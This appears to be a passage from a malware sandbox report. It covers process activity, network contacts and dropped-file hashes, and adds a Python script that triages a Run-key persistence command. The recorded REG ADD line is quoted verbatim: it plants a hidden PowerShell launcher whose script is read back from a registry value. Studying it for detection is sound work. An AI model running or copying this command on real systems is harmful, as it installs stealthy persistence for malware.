"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
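
The last two processes write the persistence entry. Two details make it worth more than a generic "Run key added" signature: the value type is REG_EXPAND_SZ, so the leading `%Rundsavsbladene%` is expanded at logon and the launcher path never appears in the Run value itself, and the script body is not on disk at all but is read back from `HKCU:\Codebtors\` value `Typeregningens` and handed to the same launcher with `-w 1` (WindowStyle Hidden). The Python below is an added example, not the report's code: it parses a `REG ADD` command line the way reg.exe sees it (double-quoted arguments, `/v /t /d /f` switches, an optional `cmd.exe /c` prefix), flags the two tricks, and lists the registry locations to pull from a suspect host. The OneDrive entry is constructed by me as a benign contrast; the assumption that `%Rundsavsbladene%` is meant to hold a powershell.exe path is mine, based on the `-w 1` switch and the PowerShell expression that follow it, since this section does not show where the variable is set.

```python
import re

# Added example (mine, not the report's): triage a `REG ADD` persistence command
# such as the one recorded for reg.exe above.

RUN_KEY = re.compile(
    r"^(HKCU|HKEY_CURRENT_USER|HKLM|HKEY_LOCAL_MACHINE)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$",
    re.IGNORECASE,
)
ENV_REF = re.compile(r"%([^%\s]+)%")
# PowerShell reading a script body back out of a registry value:
#   (Get-ItemProperty -Path 'HKCU:\Key\').ValueName
REG_READ = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\s*\.\s*(\w+)", re.IGNORECASE)
HIDDEN = re.compile(r"(^|\s)-w(indowstyle)?\s+(1|hidden)\b", re.IGNORECASE)
# Variables Windows defines for every user; any other %VAR% was planted by the sample.
STANDARD_ENV = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMDATA",
    "APPDATA", "LOCALAPPDATA", "USERPROFILE", "PUBLIC", "TEMP", "TMP", "COMSPEC",
}

# The reg.exe command line recorded in this report, verbatim.
REPORT_CMDLINE = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"'''
# The same command as the parent cmd.exe process carries it.
CMD_WRAPPED_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c ' + REPORT_CMDLINE
# Constructed benign entry for contrast (not from the report).
BENIGN_CMDLINE = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"'''


def split_windows_args(cmdline: str) -> list:
    """Split like reg.exe sees its argv: whitespace separates arguments except
    inside double quotes, and the quotes themselves are dropped."""
    args, current, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                args.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        args.append("".join(current))
    return args


def parse_reg_add(cmdline: str) -> dict:
    """Return key, value name, type and data from `[cmd /c] REG ADD <key> ...`."""
    args = split_windows_args(cmdline)
    for i in range(len(args) - 2):
        exe = args[i].rsplit("\\", 1)[-1].upper()
        if exe in ("REG", "REG.EXE") and args[i + 1].upper() == "ADD":
            break
    else:
        raise ValueError("no REG ADD verb in command line")
    entry = {"key": args[i + 2], "value_name": None, "type": "REG_SZ", "data": "", "force": False}
    j = i + 3
    while j < len(args):
        flag = args[j].lower()
        if flag == "/v":
            entry["value_name"] = args[j + 1]; j += 2
        elif flag == "/t":
            entry["type"] = args[j + 1].upper(); j += 2
        elif flag == "/d":
            entry["data"] = args[j + 1]; j += 2
        elif flag == "/f":
            entry["force"] = True; j += 1
        elif flag == "/ve":
            entry["value_name"] = ""; j += 1
        else:
            j += 1  # /s, /reg:32 and friends are irrelevant here
    return entry


def assess_run_entry(entry: dict) -> dict:
    """Flag an autostart entry whose launcher or payload lives somewhere other
    than the value itself."""
    data = entry["data"]
    reg_read = REG_READ.search(data)
    findings = {
        "autostart": bool(RUN_KEY.match(entry["key"])),
        "value_name": entry["value_name"],
        "expands_env": entry["type"] == "REG_EXPAND_SZ",
        # %VAR% references Windows itself does not define: the entry only works on a
        # host where the sample has set VAR (per-user variables live under
        # HKCU\Environment; that step is not shown in this report section).
        "unresolved_env_vars": sorted({v for v in ENV_REF.findall(data) if v.upper() not in STANDARD_ENV}),
        # Script body loaded from a registry value rather than a file on disk.
        "payload_from_registry": (reg_read.group(1), reg_read.group(2)) if reg_read else None,
        "hidden_window": bool(HIDDEN.search(data)),
    }
    findings["suspicious"] = findings["autostart"] and bool(
        findings["unresolved_env_vars"] or findings["payload_from_registry"]
    )
    return findings


def hunt_artifacts(entry: dict, findings: dict) -> list:
    """Registry locations to collect from a suspect host, derived from the entry."""
    items = [entry["key"] + "\\" + (entry["value_name"] or "(Default)")]
    if findings["payload_from_registry"]:
        path, value = findings["payload_from_registry"]
        items.append(path.rstrip("\\") + "\\" + value)
    for var in findings["unresolved_env_vars"]:
        items.append("HKCU\\Environment\\" + var)
    return items


if __name__ == "__main__":
    for cmdline in (REPORT_CMDLINE, BENIGN_CMDLINE):
        entry = parse_reg_add(cmdline)
        findings = assess_run_entry(entry)
        print(findings)
        print(hunt_artifacts(entry, findings))
```

On the report's entry the result is `suspicious=True` with `Rundsavsbladene` as the unresolved launcher variable and `HKCU:\Codebtors\` / `Typeregningens` as the payload location, which gives three registry paths to export before the host is cleaned; the OneDrive entry parses identically but raises nothing, because its data is a plain path with no foreign variable and no registry read.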

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp

Files

memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp

MD5 a827ff99cbccfab8cc86b1c1fecc9021
SHA1 911690184d451687ed5fa08601a9b93387ac97b5
SHA256 262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594
SHA512 9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp

memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp

memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp